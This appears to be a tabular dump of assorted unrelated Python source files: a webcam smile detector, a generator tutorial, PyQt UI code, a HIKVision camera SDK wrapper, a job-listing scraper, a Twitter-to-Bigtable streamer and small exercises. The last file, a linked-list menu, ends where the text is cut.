index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
986,900 | 5ea8778ed55731df707beaa878df3c44bc6a5857 | import cv2
# Face and smile classifiers (Haar cascade XML files shipped with OpenCV).
face_detector = cv2.CascadeClassifier(r'C:/Users/ymatse/Smile_detector/haarcascade_frontalface_default.xml')
smile_detector = cv2.CascadeClassifier(r'C:/Users/ymatse/Smile_detector/haarcascade_smile.xml')

# Grab webcam feed
webcam = cv2.VideoCapture(0)

# Process frames until the stream ends or the user presses 'q'.
while True:
    # Read the current frame from the webcam video stream
    successful_frame_read, frame = webcam.read()
    # If there is an error, abort
    if not successful_frame_read:
        break
    # Change to grayscale (cascades operate on single-channel images)
    frame_grayscale = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    # Detect faces first
    faces = face_detector.detectMultiScale(frame_grayscale)
    # Run smile detection within each detected face
    for (x, y, w, h) in faces:
        # Draw a rectangle around the face
        cv2.rectangle(frame, (x, y), (x + w, y + h), (100, 200, 50), 4)
        # Slice the already-converted grayscale frame instead of converting
        # the BGR face crop a second time (same pixels, one conversion less).
        face_grayscale = frame_grayscale[y:y + h, x:x + w]
        smiles = smile_detector.detectMultiScale(face_grayscale, scaleFactor=1.7, minNeighbors=20)
        # Label this face as smiling
        if len(smiles) > 0:
            cv2.putText(frame, 'smiling', (x, y + h + 40), fontScale=3,
                        fontFace=cv2.FONT_HERSHEY_PLAIN, color=(255, 255, 255))
    # Show the current frame
    cv2.imshow('Why so serious?', frame)
    # The original discarded waitKey's return value, so there was no way to
    # quit cleanly; exit when the user presses 'q'.
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break

# Cleanup
webcam.release()
cv2.destroyAllWindows()
|
986,901 | d0969c48fdf16bd31104d12dad1442806250fafd | #! /usr/bin/env python
# -*- coding:utf-8 -*-
# @Time : 2020/7/23 9:32 AM
# @Author: zhangzhihui.wisdom
# @File:generator.py
# Ways of creating a generator:
# The first method: change the list comprehension's [] to ()
# L = [x * x for x in range(10)]
# g = (x * x for x in range(10))  -- L is a list, while g is a generator
def odd():
    """Generator that yields 1, 3, 5, printing a step marker before each."""
    for step, value in enumerate((1, 3, 5), start=1):
        print('step %d' % step)
        yield value
if __name__ == '__main__':
    # A list comprehension materialises all squares at once; the generator
    # expression produces them lazily, one per iteration.
    squares_list = [x * x for x in range(10)]
    squares_gen = (x * x for x in range(10))
    print(squares_list)
    print(squares_gen)
    print("generator")
    for value in squares_gen:
        print(value)
    # Drive the odd() generator two steps by hand.
    gen = odd()
    print(next(gen))
    print(next(gen))
# if function contains a yield, the function become a generator
# yield statement suspends function's execution and sends a value back to the caller
# but retains enough state to enable function to resume where it is left off
# when resumed, the function continues execution immediately after the last yield run.
# this allows its code to produce a series of values over time, rather than computing them at once
# and sending them back like a list
|
986,902 | 452350f342839e8e2a1fb1ae83e52fcb34de7773 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mainwidget.ui'
#
# Created by: PyQt5 UI code generator 5.8.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_mainForm(object):
    """pyuic5-generated UI layout for the face-recognition main window.

    Generated from 'mainwidget.ui'; hand edits are lost when the .ui file
    is recompiled.  setupUi() builds the widget tree on a plain QWidget,
    retranslateUi() installs all user-visible strings.
    """

    def setupUi(self, mainForm):
        """Create widgets, size policies and layouts on *mainForm*."""
        mainForm.setObjectName("mainForm")
        mainForm.setWindowModality(QtCore.Qt.NonModal)
        mainForm.resize(689, 338)
        # Top-level row: camera preview (left, stretch 5) | control column (right, stretch 2).
        self.horizontalLayout = QtWidgets.QHBoxLayout(mainForm)
        self.horizontalLayout.setObjectName("horizontalLayout")
        # Live camera preview area.
        self.cameraLabel = QtWidgets.QLabel(mainForm)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(5)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.cameraLabel.sizePolicy().hasHeightForWidth())
        self.cameraLabel.setSizePolicy(sizePolicy)
        self.cameraLabel.setStyleSheet("background: black; color: rgb(128, 128, 128)")
        self.cameraLabel.setAlignment(QtCore.Qt.AlignCenter)
        self.cameraLabel.setObjectName("cameraLabel")
        self.horizontalLayout.addWidget(self.cameraLabel)
        # Right-hand control column container.
        self.controlWidget = QtWidgets.QWidget(mainForm)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(2)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.controlWidget.sizePolicy().hasHeightForWidth())
        self.controlWidget.setSizePolicy(sizePolicy)
        self.controlWidget.setObjectName("controlWidget")
        self.verticalLayout = QtWidgets.QVBoxLayout(self.controlWidget)
        self.verticalLayout.setContentsMargins(0, 0, 0, 0)
        self.verticalLayout.setSpacing(6)
        self.verticalLayout.setObjectName("verticalLayout")
        # "Add training data" section (vertical stretch 4 of the column).
        self.addDataWidget = QtWidgets.QWidget(self.controlWidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(4)
        sizePolicy.setHeightForWidth(self.addDataWidget.sizePolicy().hasHeightForWidth())
        self.addDataWidget.setSizePolicy(sizePolicy)
        self.addDataWidget.setObjectName("addDataWidget")
        self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.addDataWidget)
        self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
        self.verticalLayout_2.setSpacing(3)
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        # Preview of the last captured training image (plus instructions).
        self.capturedLabel = QtWidgets.QLabel(self.addDataWidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(10)
        sizePolicy.setHeightForWidth(self.capturedLabel.sizePolicy().hasHeightForWidth())
        self.capturedLabel.setSizePolicy(sizePolicy)
        self.capturedLabel.setStyleSheet("background: rgb(128, 128, 128); padding: 5")
        self.capturedLabel.setAlignment(QtCore.Qt.AlignCenter)
        self.capturedLabel.setWordWrap(True)
        self.capturedLabel.setObjectName("capturedLabel")
        self.verticalLayout_2.addWidget(self.capturedLabel)
        # Name entry for the person being added to the training set.
        self.nameLineEdit = QtWidgets.QLineEdit(self.addDataWidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.nameLineEdit.sizePolicy().hasHeightForWidth())
        self.nameLineEdit.setSizePolicy(sizePolicy)
        self.nameLineEdit.setFocusPolicy(QtCore.Qt.ClickFocus)
        self.nameLineEdit.setAlignment(QtCore.Qt.AlignCenter)
        self.nameLineEdit.setDragEnabled(True)
        self.nameLineEdit.setObjectName("nameLineEdit")
        self.verticalLayout_2.addWidget(self.nameLineEdit)
        # Button that captures the current frame as a training image.
        self.addDataButton = QtWidgets.QPushButton(self.addDataWidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.addDataButton.sizePolicy().hasHeightForWidth())
        self.addDataButton.setSizePolicy(sizePolicy)
        self.addDataButton.setObjectName("addDataButton")
        self.verticalLayout_2.addWidget(self.addDataButton)
        # Small status line under the button ("No Image Added", etc.).
        self.statusLabel = QtWidgets.QLabel(self.addDataWidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.statusLabel.sizePolicy().hasHeightForWidth())
        self.statusLabel.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(10)
        self.statusLabel.setFont(font)
        self.statusLabel.setAutoFillBackground(False)
        self.statusLabel.setStyleSheet("color: rgb(128, 128, 128)")
        self.statusLabel.setLineWidth(0)
        self.statusLabel.setAlignment(QtCore.Qt.AlignCenter)
        self.statusLabel.setObjectName("statusLabel")
        self.verticalLayout_2.addWidget(self.statusLabel)
        self.verticalLayout.addWidget(self.addDataWidget)
        # Horizontal separator between the add-data and recognize sections.
        self.line = QtWidgets.QFrame(self.controlWidget)
        self.line.setStyleSheet("")
        self.line.setLineWidth(1)
        self.line.setFrameShape(QtWidgets.QFrame.HLine)
        self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
        self.line.setObjectName("line")
        self.verticalLayout.addWidget(self.line)
        # Train / recognize section (vertical stretch 1 of the column).
        self.recognizeWidget = QtWidgets.QWidget(self.controlWidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(1)
        sizePolicy.setHeightForWidth(self.recognizeWidget.sizePolicy().hasHeightForWidth())
        self.recognizeWidget.setSizePolicy(sizePolicy)
        self.recognizeWidget.setObjectName("recognizeWidget")
        self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.recognizeWidget)
        self.verticalLayout_3.setContentsMargins(0, 2, 0, 0)
        self.verticalLayout_3.setObjectName("verticalLayout_3")
        self.trainButton = QtWidgets.QPushButton(self.recognizeWidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.trainButton.sizePolicy().hasHeightForWidth())
        self.trainButton.setSizePolicy(sizePolicy)
        self.trainButton.setObjectName("trainButton")
        self.verticalLayout_3.addWidget(self.trainButton)
        self.recognizeButton = QtWidgets.QPushButton(self.recognizeWidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(1)
        sizePolicy.setHeightForWidth(self.recognizeButton.sizePolicy().hasHeightForWidth())
        self.recognizeButton.setSizePolicy(sizePolicy)
        self.recognizeButton.setStyleSheet("")
        self.recognizeButton.setObjectName("recognizeButton")
        self.verticalLayout_3.addWidget(self.recognizeButton)
        # Threshold label + edit row beneath the recognize button.
        self.widget = QtWidgets.QWidget(self.recognizeWidget)
        self.widget.setObjectName("widget")
        self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.widget)
        self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)
        self.horizontalLayout_2.setObjectName("horizontalLayout_2")
        self.thresholdLabel = QtWidgets.QLabel(self.widget)
        self.thresholdLabel.setObjectName("thresholdLabel")
        self.horizontalLayout_2.addWidget(self.thresholdLabel)
        self.thresholdLineEdit = QtWidgets.QLineEdit(self.widget)
        self.thresholdLineEdit.setFocusPolicy(QtCore.Qt.ClickFocus)
        self.thresholdLineEdit.setObjectName("thresholdLineEdit")
        self.horizontalLayout_2.addWidget(self.thresholdLineEdit)
        self.verticalLayout_3.addWidget(self.widget)
        self.verticalLayout.addWidget(self.recognizeWidget)
        self.horizontalLayout.addWidget(self.controlWidget)
        # Install text and wire up auto-connected slots by objectName.
        self.retranslateUi(mainForm)
        QtCore.QMetaObject.connectSlotsByName(mainForm)

    def retranslateUi(self, mainForm):
        """Set all translatable user-visible strings."""
        _translate = QtCore.QCoreApplication.translate
        mainForm.setWindowTitle(_translate("mainForm", "JH Face"))
        self.cameraLabel.setText(_translate("mainForm", "No Supported Camera"))
        self.capturedLabel.setText(_translate("mainForm", "Enter name then click \"Add Training Image\" button to capture and add image to training data"))
        self.nameLineEdit.setPlaceholderText(_translate("mainForm", "Name"))
        self.addDataButton.setText(_translate("mainForm", "Add Training Image"))
        self.statusLabel.setText(_translate("mainForm", "No Image Added"))
        self.trainButton.setText(_translate("mainForm", "Train"))
        self.recognizeButton.setText(_translate("mainForm", "RECOGNIZE"))
        self.thresholdLabel.setText(_translate("mainForm", "Threshold:"))
|
986,903 | d73499ace5cddebddef6fbdbf6a59441b968c3b3 | import pandas as pd
import numpy as np
def get_ticker(ticker):
    """Look up *ticker* in stock_data.csv and return its metadata.

    Parameters
    ----------
    ticker : str
        Ticker symbol, matched exactly against the 'Ticker' column.

    Returns
    -------
    tuple
        (cik, name, exchange) for the matching row.

    Raises
    ------
    ValueError
        From Series.item() when the ticker matches zero rows or
        more than one row.
    """
    data = pd.read_csv('stock_data.csv')
    # Filter once instead of re-scanning the whole frame per column.
    row = data[data['Ticker'] == ticker]
    return row['CIK'].item(), row['Name'].item(), row['Exchange'].item()
986,904 | 5d35bca0c9ff731eea98971ff9f0545765440ec7 | # Write a program, which find all the numbers between 100 and 500
# such that each digit of the number is odd and then print the numbers.
# For example, 111 is the first number between 100 and 500 which all the digits are odd.
# you may want to use for loop, and list to program this task)
# Collect every number in [100, 500] whose decimal digits are all odd.
# Checking each character of str(n) replaces the original's manual
# hundreds/tens/ones extraction and per-digit boolean flags; a digit is
# odd when int(digit) % 2 != 0.
num_list = [n for n in range(100, 501)
            if all(int(digit) % 2 != 0 for digit in str(n))]

print("The list of numbers between 100 and 500 in which each digit is odd:")
print(num_list)  # print number list with all numbers odd in each digit
|
986,905 | 2ce82b829671a158eb392ad2eddd931a3ab1086f | import opennlpModels
from opennlpModels import SentenceDetector
from opennlpModels import Tokenizer
from opennlpModels import NameFinder
from opennlpModels import PosTagger
from opennlpModels import Chunker
# Run the chunker over the buffered input file and print its result.
chunker = Chunker()
chunker.setInputFile("tempBuffer/chunkerInput.txt")
chunker.run()
chunker.printOutput()
|
986,906 | 7485322804a283eef530d81725fe25b979f205c6 | from django.db import models
class Document(models.Model):
    """A single uploaded video file."""
    # Uploaded files are stored under videos/<year>/<month>/<day>/;
    # the %Y/%m/%d placeholders are expanded at save time.
    docfile = models.FileField(upload_to='videos/%Y/%m/%d')
|
986,907 | 4b203714d20dae8ded6b838427e3967ca71c868b | import numpy as np
import matplotlib.pyplot as plt
# Reference: https://matplotlib.org/2.0.2/contents.html
# Sample [-2*pi, 2*pi] and draw the cosine (dashed) and sine curves.
samples = np.linspace(-2 * np.pi, 2 * np.pi, 256)
plt.plot(samples, np.cos(samples), '--', linewidth=2)
plt.plot(samples, np.sin(samples))
plt.show()
986,908 | 06921893916f9c8f1d02d9e219a66e00b79c19ae | '''
Python Starter Code
>> python main.py
'''
import os
import requests
from datetime import datetime
# Base URL of the trip/pricing API.
URL = "https://lyft-vingkan.c9users.io"
# Team secret sent with every request; raises KeyError at import time
# if the TEAM_SECRET environment variable is not set.
TEAM = os.environ["TEAM_SECRET"]
'''
Helper Methods
'''
# Get Trips
def get_trips(query):
    """GET /trips/ matching *query*; returns the decoded JSON response.

    Note: the team secret is written into *query* in place (the caller's
    dict is modified), matching the original behaviour.
    """
    query["team"] = TEAM
    return requests.get(URL + "/trips/", params=query).json()
# Set Pricing
def set_pricing(pricing):
    """POST new pricing parameters; returns the decoded JSON response.

    The team secret is added to *pricing* in place (caller's dict is
    modified), matching the original behaviour.
    """
    pricing["team"] = TEAM
    return requests.post(URL + "/pricing/", params=pricing).json()
# Set Power Zones
def set_zones(zones):
    """POST the power-zone list (joined as a comma-separated string)."""
    payload = {
        "team": TEAM,
        "zones": ",".join(str(zone) for zone in zones),
    }
    return requests.post(URL + "/zones/", params=payload).json()
def string_to_date(datestring):
    """Parse a 'YYYY-MM-DDTHH:MM:SS' timestamp string into a datetime."""
    fmt = "%Y-%m-%dT%H:%M:%S"
    return datetime.strptime(datestring, fmt)
'''
Example Usage
'''
# Example usage: list one hour of trips, then push pricing and zones.
trips = get_trips({
    "start": "9/10/2017 2:00 PM",
    "end": "9/10/2017 3:00 PM",
    "limit": 10,
})
for trip in trips["response"]:
    started = string_to_date(trip["trip_start_timestamp"])
    when = started.strftime("%m/%d %r")
    pickup = trip["pickup_community_area"]
    dropoff = trip["dropoff_community_area"]
    print("Trip at %s from area %s to %s" % (when, pickup, dropoff))

pricing_response = set_pricing({
    "base": 3.40,
    "pickup": 1.00,
    "per_mile": 0.20,
    "per_minute": 0.30,
})
print(pricing_response)

zones_response = set_zones([5, 6, 7])
print(zones_response)
|
986,909 | f2eceb92ca4c86ce027b0a120f51ef3e244808e4 | # wrapper around python.platform
import platform
import getpass
def origin_hostname():
    # NOTE(review): despite the name, this returns the *login user name*
    # (getpass.getuser()), not a host name — while origin_hardname() below
    # returns platform.node(), the network name. The two look swapped;
    # confirm with callers before renaming/fixing.
    return getpass.getuser()
def origin_hardname():
    # Returns the machine's network (node) name; see the swapped-naming
    # note on origin_hostname().
    return platform.node()
986,910 | c88f06340bae9353130c64c1ee25be89474758fa | #demonstrate slice of strings
word="pizza"
print(word[:])
print(
"""
0 1 2 3 4 5
+--+--+--+--+--+
| p| i| z| z| a|
+--+--+--+--+--+
-5-4 -3 -2 -1
"""
)
print("Enter start and end index for slice 'pizza' which you want")
print("Press Enter to exit, not enter start index")
start=None
while start!="":
start=(input("\nStart index: "))
if start:
start=int(start)
finish=int(input("End index: "))
print("Slice word[",start,":",finish,"] looks like",end=" ")
print(word[start:finish])
input("\n\nPress enter to exit")
|
986,911 | 26f2663a148144af76f36e3f17ce9c5c7420f9ad | import os
import ctypes
import functools
from .hk_define import *
from .hk_struct import LPNET_DVR_DEVICEINFO_V30, NET_DVR_FOCUSMODE_CFG, NET_DVR_JPEGPARA
from .hikvision_infrared import get_temper_info
# The logging module is forbidden here; use print-based logging instead.
def _release_wrapper(func):
    """Decorator: after *func* runs, release the SDK session.

    Resources are freed only when the call did not pass
    release_resources=False (keyword only) and the instance is logged in
    (user_id != -1).  The wrapped method's return value is passed through.
    """
    @functools.wraps(func)
    def inner(*args, **kwargs):
        result = func(*args, **kwargs)
        sdk = args[0]  # the bound instance (methods are called positionally)
        if kwargs.get('release_resources', True) and sdk.user_id != -1:
            sdk._destroy()
        return result
    return inner
class HIKVisionSDK(object):
    """ctypes wrapper around HIKVision's libhcnetsdk.so camera SDK.

    Usage: ``HIKVisionSDK(lib_dir, ip, user, pwd).init()`` then call
    take_picture / get_zoom / set_zoom / get_infrared_value.  Methods
    decorated with @_release_wrapper log out and free SDK resources when
    they return, unless called with release_resources=False.
    """

    def __init__(self, lib_dir, ip, username, password, port=8000, channel=1, debug=True):
        self.lib_dir = lib_dir
        # The SDK must be loaded with lib_dir as the working directory;
        # remember the original cwd so _destroy() can restore it.
        self.old_cwd = os.getcwd()
        self.ip = ip
        self.username = username
        self.password = password
        self.port = port
        self.user_id = -1      # SDK session handle; -1 means "not logged in"
        self.hk_so_lib = None  # ctypes handle to libhcnetsdk.so
        self.channel = channel
        self.err_code = 0      # last SDK error number (0 = no error yet)
        self.debug = debug

    def print_log(self, msg):
        # Minimal console logger; the logging module is not used here.
        if self.debug:
            print(msg)

    def init(self):
        """Load and initialise the native SDK, then log in.

        Returns self for chaining; raises Exception on init/login failure.
        """
        self.print_log('开始改变工作目录 %s' % self.lib_dir)
        os.chdir(self.lib_dir)
        self.print_log('开始加载libhcnetsdk.so')
        self.hk_so_lib = ctypes.cdll.LoadLibrary("./libhcnetsdk.so")
        ok = self.hk_so_lib.NET_DVR_Init()
        if not ok:
            self.err_code = -1
            raise Exception("<<<海康sdk初始化失败")
        self._login()
        return self

    def _login(self):
        """Log into the device; stores the session id in self.user_id."""
        self.print_log('开始登录')
        device_info = LPNET_DVR_DEVICEINFO_V30()
        result = self.hk_so_lib.NET_DVR_Login_V30(bytes(self.ip, 'ascii'),
                                                  self.port,
                                                  bytes(self.username, 'ascii'),
                                                  bytes(self.password, 'ascii'),
                                                  ctypes.byref(device_info))
        if result == -1:
            error_num = self.hk_so_lib.NET_DVR_GetLastError()
            self.err_code = error_num
            # No session was established, so skip the logout step.
            self._destroy(logout=False)
            raise Exception("<<<海康SDK调用错误 ERRCODE: %s" % error_num)
        self.print_log('登录成功')
        self.user_id = result

    def _destroy(self, logout=True):
        """Log out (optionally), release SDK resources, restore the cwd."""
        if logout:
            self.print_log('>>>开始注销资源')
            res = self.hk_so_lib.NET_DVR_Logout(self.user_id)
            if not res:
                self.print_log('<<<User退出失败')
        self.print_log('>>>开始释放资源')
        res = self.hk_so_lib.NET_DVR_Cleanup()
        if not res:
            self.print_log('<<<释放资源失败')
        os.chdir(self.old_cwd)
        self.print_log('>>>成功还原工作目录 %s' % os.getcwd())

    @_release_wrapper
    def take_picture(self, pic_pathname, release_resources=True) -> bool:
        """Capture one JPEG frame to *pic_pathname*; True on success."""
        if self.user_id == -1:
            self.print_log('未初始化或者初始化失败')
            return False
        self.print_log('开始拍照 %s' % pic_pathname)
        obj = NET_DVR_JPEGPARA()
        result = self.hk_so_lib.NET_DVR_CaptureJPEGPicture(self.user_id,
                                                           self.channel,
                                                           ctypes.byref(obj),
                                                           bytes(pic_pathname, 'utf-8'))
        if not result:
            error_num = self.hk_so_lib.NET_DVR_GetLastError()
            self.print_log('<<<拍照失败 ERRCODE: %s' % error_num)
            return False
        self.print_log('拍照成功')
        return True

    @_release_wrapper
    def get_zoom(self, release_resources=True) -> int:
        """Return the current optical zoom level; -1 if failure."""
        if self.user_id == -1:
            self.print_log('<<<未初始化或者初始化失败 user_id %s' % self.user_id)
            # BUGFIX: previously returned False, contradicting both the
            # documented "-1 if failure" contract and the int return type.
            return -1
        self.print_log('开始获取变焦')
        struct_cfg = NET_DVR_FOCUSMODE_CFG()
        dw_returned = ctypes.c_uint16(0)
        result = self.hk_so_lib.NET_DVR_GetDVRConfig(self.user_id,
                                                     NET_DVR_GET_FOCUSMODECFG,
                                                     self.channel,
                                                     ctypes.byref(struct_cfg),
                                                     255,
                                                     ctypes.byref(dw_returned))
        if not result:
            self.print_log('<<<获取变焦失败')
            return -1
        self.print_log('value %s' % struct_cfg.fOpticalZoomLevel)
        return struct_cfg.fOpticalZoomLevel

    @_release_wrapper
    def set_zoom(self, zoom, release_resources=True) -> bool:
        """Set the optical zoom to *zoom*; True on success or no-op."""
        # BUGFIX: the original tested `self.hk_so_lib == -1`, which can
        # never be true (it is None or a CDLL object); the logged-in check
        # belongs on user_id, consistent with take_picture/get_zoom.
        if self.user_id == -1:
            self.print_log('<<<未初始化或者初始化失败')
            return False
        self.print_log('开始设置变倍 zoom %s' % zoom)
        struct_cfg = NET_DVR_FOCUSMODE_CFG()
        dw_returned = ctypes.c_uint16(0)
        result = self.hk_so_lib.NET_DVR_GetDVRConfig(self.user_id,
                                                     NET_DVR_GET_FOCUSMODECFG,
                                                     self.channel,
                                                     ctypes.byref(struct_cfg),
                                                     255,
                                                     ctypes.byref(dw_returned))
        if not result:
            self.print_log('<<<获取变倍失败')
            return False
        cur_zoom = struct_cfg.fOpticalZoomLevel
        self.print_log("当前变倍值为 {} ".format(cur_zoom))
        if cur_zoom == zoom:
            self.print_log('已经是相同的倍值 %s' % cur_zoom)
            return True
        if cur_zoom == 0:
            self.print_log('此摄像头不支持变焦')
            return False
        struct_cfg.fOpticalZoomLevel = ctypes.c_float(zoom)
        result = self.hk_so_lib.NET_DVR_SetDVRConfig(self.user_id,
                                                     NET_DVR_SET_FOCUSMODECFG,
                                                     self.channel,
                                                     ctypes.byref(struct_cfg),
                                                     255)
        if not result:
            self.print_log('<<<变倍失败')
            return False
        self.print_log('success %s' % zoom)
        return True

    def get_infrared_value(self) -> tuple:
        """Return (min, max, average) temperature; (-1, -1, -1) on error."""
        os.chdir(self.lib_dir)
        self.print_log('开始获取红外')
        try:
            min_temper, max_temper, aver_temp = get_temper_info(ip=self.ip, username=self.username,
                                                                password=self.password)
        except Exception as e:
            # Best-effort: report the error and fall back to sentinel values.
            self.print_log(e)
            min_temper, max_temper, aver_temp = -1, -1, -1
        self.print_log(" min_temper {0}, max_temper {1}, aver_temp {2}".format(min_temper, max_temper, aver_temp))
        os.chdir(self.old_cwd)
        return min_temper, max_temper, aver_temp
|
986,912 | d68581d367a957022d4555f7a30ed6d0e8a0214d | # Task 1
import time
class TrafficLight:
    """Runs one red → yellow → green cycle, printing each colour."""

    def __init__(self):
        # Light colours in switching order.
        self._color_1 = 'red'
        self._color_2 = 'yellow'
        self._color_3 = 'green'

    def running(self):
        """Print each colour in turn, holding it for its duration (seconds)."""
        phases = ((self._color_1, 7), (self._color_2, 2), (self._color_3, 5))
        for color, seconds in phases:
            print(color)
            time.sleep(seconds)
# Demo: run one full red/yellow/green cycle (blocks for ~14 s of sleeps).
traffic_light = TrafficLight()
traffic_light.running()
|
986,913 | 939e5f5f713ef0e67ad9d75fd4e263cb59d814d5 | '''
This module's task is to fetch the job listings.
'''
from spider4 import Spider4
import re #引入正则模块
from urllib import request #引入数据请求模块
class Spider3():
    """Fetch a job-listing page and extract the job links from it."""

    # Regex capturing the job link.  Declared as a class attribute so that
    # analysis() can read Spider3.root_pattern — the original assigned it
    # to a throwaway local inside __init__, making that lookup fail with
    # AttributeError.
    root_pattern = r'"job_href":"([\s\S]*?)","job_name"'

    def __init__(self, url):
        self.url = url

    def fetch_content(self):
        """Download self.url and decode the body as GBK (errors ignored)."""
        r = request.urlopen(self.url)
        htmls = r.read()
        htmls = str(htmls, encoding='gbk', errors='ignore')
        return htmls

    def analysis(self, htmls):
        """Return every job-link capture found in *htmls*."""
        root_html = re.findall(Spider3.root_pattern, htmls)
        return root_html

    def go(self):
        """Fetch the page and return the parsed list of job links."""
        htmls = self.fetch_content()
        root_html = self.analysis(htmls)
        return root_html
|
986,914 | 906448853099d29a8b7bdb906f77543e30feb154 |
#NLP Sentiment Analysis
from google.cloud import language
from google.cloud.language import enums
from google.cloud.language import types
from google.cloud import bigtable
#Import the necessary methods from tweepy library
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
#JSON parsing
import json
#UUID
import uuid
#Variables that contains the user credentials to access Twitter API
# URI scheme for Cloud Storage.
GOOGLE_STORAGE = 'gs'
# URI scheme for accessing local files.
LOCAL_FILE = 'file'
# Bigtable connection settings.
instance_id = 'crypto-farm-datastore'
project_id = 'crypto-sent-analysis'
column_family_id = 'twitter_farm'
# NOTE(review): the Bigtable client is created at import time, so merely
# importing this module requires valid Google credentials.
client = bigtable.Client(project=project_id, admin=True)
instance = client.instance(instance_id)
def analyze(content):
    """Run a sentiment analysis request on text within a passed filename."""
    nlp_client = language.LanguageServiceClient()
    document = types.Document(
        content=content,
        type=enums.Document.Type.PLAIN_TEXT)
    # Single-document sentiment; only the overall score is returned.
    annotations = nlp_client.analyze_sentiment(document=document)
    return annotations.document_sentiment.score
#This is a basic listener that just prints received tweets to stdout.
class StdOutListener(StreamListener):
    """Tweepy stream listener intended to write tweet fields to Bigtable.

    NOTE(review): this file uses Python 2 syntax (`print status` below).
    """

    def on_data(self, data):
        # Parse the raw tweet JSON and strip CR/LF from the text.
        parsed_data = json.loads(data)
        text = parsed_data['text'].replace("\r","")
        text = text.replace("\n","")
        # score = analyze(text)
        name = parsed_data['user']['name']
        screen_name = parsed_data['user']['screen_name']
        retweet_count = parsed_data['retweet_count']
        fav_count = parsed_data['favorite_count']
        followers_count = parsed_data['user']['followers_count']
        timestamp_ms = parsed_data['timestamp_ms']
        lang = parsed_data['lang']
        row_key = uuid.uuid4()
        # NOTE(review): `row` is never defined — presumably it should be
        # obtained from a Bigtable table via row_key (e.g. table.row(...)),
        # so as written this method raises NameError.  Also
        # retweet_count / fav_count / followers_count are ints from the
        # JSON and have no .encode(); confirm the intended conversion.
        row.set_cell(
            column_family_id,
            'name'.encode('utf-8'),
            name.encode('utf-8'))
        row.set_cell(
            column_family_id,
            'screen_name'.encode('utf-8'),
            screen_name.encode('utf-8'))
        row.set_cell(
            column_family_id,
            'retweet_count'.encode('utf-8'),
            retweet_count.encode('utf-8'))
        row.set_cell(
            column_family_id,
            'fav_count'.encode('utf-8'),
            fav_count.encode('utf-8'))
        row.set_cell(
            column_family_id,
            'followers_count'.encode('utf-8'),
            followers_count.encode('utf-8'))
        row.set_cell(
            column_family_id,
            'timestamp_ms'.encode('utf-8'),
            timestamp_ms.encode('utf-8'))
        row.set_cell(
            column_family_id,
            'lang'.encode('utf-8'),
            lang.encode('utf-8'))
        row.commit()
        # Returning True keeps the stream alive.
        return True

    def on_error(self, status):
        # Python 2 print statement.
        print status
if __name__ == '__main__':
    # This handles Twitter authentication and the connection to the
    # Twitter Streaming API.
    # NOTE(review): consumer_key / consumer_secret / access_token /
    # access_token_secret are not defined anywhere in this file — they
    # must come from elsewhere or this block raises NameError.
    l = StdOutListener()
    auth = OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    stream = Stream(auth, l)
    # Filter the stream to the crypto keywords 'xrp', 'lumens', 'xlm'.
    stream.filter(track=['xrp', 'lumens', 'xlm'])
|
986,915 | e8b357b1c1407f393eef02b2b39245410909800e | #!/Library/Frameworks/Python.framework/Versions/3.9/bin/python3
from DoublyLinkedList import DoublyLinkedList
from os import system
import copy
# Interactive console menu for exercising DoublyLinkedList.
listLinked=DoublyLinkedList(5)
option=1  # anything other than '0' so the loop runs at least once
while option!='0':
    system("clear")  # clear the terminal (POSIX only)
    print('1. Insert End')
    print('2. Delete First')
    print('3. Get')
    print('4. Show List')
    print('0. Exit')
